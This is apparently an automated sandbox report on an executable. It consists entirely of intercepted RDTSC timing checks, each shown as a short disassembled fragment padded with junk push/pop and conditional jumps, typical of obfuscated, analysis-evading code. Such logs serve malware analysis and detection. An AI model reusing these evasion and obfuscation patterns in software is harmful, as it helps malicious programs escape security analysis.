Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A528C8 second address: A5291E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F45412F2580h 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F45412F257Ah 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 je 00007F45412F257Ah 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 js 00007F45412F2584h 0x00000028 jmp 00007F45412F257Eh 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 pushad 0x00000032 jng 00007F45412F2578h 0x00000038 push eax 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A57BC1 second address: A57BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5DB42 second address: A5DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5DB48 second address: A5DB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F4540B7FD16h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 jnl 00007F4540B7FD16h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C911 second address: A5C91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45412F2576h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C91D second address: A5C921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C921 second address: A5C925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A242DE second address: A242E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A242E3 second address: A0C442 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c call 00007F45412F257Fh 0x00000011 or di, A6CFh 0x00000016 pop ebx 0x00000017 add eax, 6FBF61C0h 0x0000001d popad 0x0000001e stc 0x0000001f lea eax, dword ptr [ebp+124890F7h] 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F45412F2578h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov cx, ax 0x00000042 nop 0x00000043 jmp 00007F45412F2580h 0x00000048 push eax 0x00000049 pushad 0x0000004a jmp 00007F45412F2581h 0x0000004f jmp 00007F45412F2588h 0x00000054 popad 0x00000055 nop 0x00000056 mov ch, al 0x00000058 call dword ptr [ebp+122D1C5Eh] 0x0000005e push ebx 0x0000005f jl 00007F45412F2583h 0x00000065 push esi 0x00000066 pop esi 0x00000067 jmp 00007F45412F257Bh 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F45412F2584h 0x00000073 push ecx 0x00000074 pop ecx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2446D second address: A2447D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4540B7FD1Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A247A4 second address: A247BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45412F2581h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2493F second address: A24953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jnl 00007F4540B7FD16h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24953 second address: A24970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c je 00007F45412F257Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24970 second address: A2497E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2497E second address: A24982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24A94 second address: A24A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24A99 second address: A24ACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c mov dl, al 0x0000000e nop 0x0000000f push eax 0x00000010 push ebx 0x00000011 jbe 00007F45412F2576h 0x00000017 pop ebx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d je 00007F45412F2576h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24ACE second address: A24AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2512A second address: A251A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F45412F2576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jp 00007F45412F2589h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F45412F2578h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d sub dword ptr [ebp+1245C116h], edx 0x00000033 push 0000001Eh 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F45412F2578h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jnc 00007F45412F2576h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25525 second address: A0CF02 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4540B7FD28h 0x00000008 jmp 00007F4540B7FD22h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D1AFCh] 0x00000016 lea eax, dword ptr [ebp+124890F7h] 0x0000001c and di, 236Ch 0x00000021 nop 0x00000022 push ebx 0x00000023 jmp 00007F4540B7FD20h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edi 0x0000002b jo 00007F4540B7FD18h 0x00000031 pushad 0x00000032 popad 0x00000033 pop edi 0x00000034 nop 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F4540B7FD18h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f and ch, 00000053h 0x00000052 call dword ptr [ebp+122D20E7h] 0x00000058 pushad 0x00000059 push eax 0x0000005a jmp 00007F4540B7FD1Ah 0x0000005f ja 00007F4540B7FD16h 0x00000065 pop eax 0x00000066 jmp 00007F4540B7FD1Dh 0x0000006b push edx 0x0000006c jmp 00007F4540B7FD1Ah 0x00000071 pop edx 0x00000072 popad 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF02 second address: A0CF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CF06 second address: A0CF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4540B7FD29h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4540B7FD1Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D03C second address: A5D057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2583h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D651 second address: A5D66F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4540B7FD16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4540B7FD22h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D66F second address: A5D67A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F45412F2576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62602 second address: A6260D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6260D second address: A62611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62795 second address: A627A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4540B7FD16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A627A8 second address: A627C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F45412F257Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A627C1 second address: A627D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4540B7FD21h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62AD4 second address: A62AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62C3F second address: A62C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62D90 second address: A62D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62D94 second address: A62DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62DA0 second address: A62DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A63064 second address: A6306A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7E6C second address: 9E7E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2586h 0x00000009 popad 0x0000000a jbe 00007F45412F2582h 0x00000010 jo 00007F45412F2576h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B0F5 second address: A6B121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jno 00007F4540B7FD16h 0x0000000c popad 0x0000000d jc 00007F4540B7FD2Fh 0x00000013 jmp 00007F4540B7FD29h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B121 second address: A6B132 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45412F257Ch 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B132 second address: A6B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2A4 second address: A6B2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2AA second address: A6B2BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4540B7FD18h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F4540B7FD16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2BD second address: A6B2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F45412F257Fh 0x0000000e jno 00007F45412F2576h 0x00000014 jmp 00007F45412F257Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2EC second address: A6B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4540B7FD16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2FB second address: A6B2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B2FF second address: A6B303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BA21 second address: A6BA2B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45412F257Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BEAA second address: A6BED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4540B7FD16h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F4540B7FD28h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BED2 second address: A6BED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BED6 second address: A6BEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C044 second address: A6C054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F45412F2584h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C1BC second address: A6C1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C1C4 second address: A6C1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C1C8 second address: A6C1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C1CC second address: A6C1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45412F2585h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2D37 second address: 9E2D41 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4540B7FD16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2D41 second address: 9E2D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F45412F2586h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2D5D second address: 9E2D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4540B7FD16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72978 second address: A7297E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A751D1 second address: A751F1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4540B7FD18h 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F4540B7FD16h 0x00000010 jmp 00007F4540B7FD1Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A751F1 second address: A751F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74EA6 second address: A74EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B9D2 second address: A7B9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B9D8 second address: A7B9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BCDC second address: A7BCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F45412F257Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BE4B second address: A7BE77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4540B7FD21h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4540B7FD1Fh 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BE77 second address: A7BE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BE7B second address: A7BE81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BFBB second address: A7BFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BFC0 second address: A7BFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007F4540B7FD16h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F4540B7FD1Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BFE5 second address: A7BFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F45412F2576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BFEF second address: A7BFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C122 second address: A7C14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F45412F2576h 0x0000000a pop edx 0x0000000b jng 00007F45412F2591h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C2EE second address: A7C2F8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4540B7FD1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C2F8 second address: A7C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80DBA second address: A80DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80DC0 second address: A80DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A807E1 second address: A807E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A807E5 second address: A807E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80ABA second address: A80ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A84435 second address: A84439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A84439 second address: A84451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4540B7FD1Fh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A84570 second address: A84574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C199 second address: A8C19F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A5B2 second address: A8A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A5B8 second address: A8A5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A885 second address: A8A88A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A88A second address: A8A8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F4540B7FD1Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F4540B7FD1Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A8AC second address: A8A8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F45412F257Ah 0x00000008 jmp 00007F45412F2589h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8ABBD second address: A8ABF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4540B7FD1Ah 0x0000000a pop eax 0x0000000b jmp 00007F4540B7FD27h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F4540B7FD16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8ABF0 second address: A8ABFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F45412F2576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
